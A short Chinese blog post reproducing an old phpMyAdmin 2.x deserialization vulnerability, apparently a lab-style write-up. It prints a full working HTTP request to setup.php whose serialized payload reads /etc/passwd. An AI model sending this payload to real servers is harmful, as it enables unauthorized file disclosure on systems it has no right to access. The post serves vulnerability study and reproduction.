Phpmyadmin 2.X 反序列化漏洞(WooYun-2016-199433)

Posted whited

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Phpmyadmin 2.X 反序列化漏洞(WooYun-2016-199433)相关的知识,希望对你有一定的参考价值。

漏洞简介

phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。

漏洞影响版本

phpmyadmin 2.x

漏洞复现

访问漏洞存在页面  上burp抓包 构造URL

 1 POST /scripts/setup.php HTTP/1.1
 2 Host: your-ip:8080
 3 Accept-Encoding: gzip, deflate
 4 Accept: */*
 5 Accept-Language: en
 6 User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
 7 Connection: close
 8 Content-Type: application/x-www-form-urlencoded
 9 Content-Length: 80
10 
11 action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

 

更改请求为post并添加如下payload后发送,即可读取/etc/passwd

 

以上是关于Phpmyadmin 2.X 反序列化漏洞(WooYun-2016-199433)的主要内容,如果未能解决你的问题,请参考以下文章

Phpmyadmin 2.X 反序列化漏洞(WooYun-2016-199433)

(CVE-2016-5734)phpmyadmin反序列化漏洞复现

(CVE-2016-5734)phpmyadmin反序列化漏洞复现

(CVE-2016-5734)phpmyadmin反序列化漏洞复现

(CVE-2016-5734)phpmyadmin反序列化漏洞复现

ThinkPHP3.2.x (SQL注入&文件读取)反序列化POP链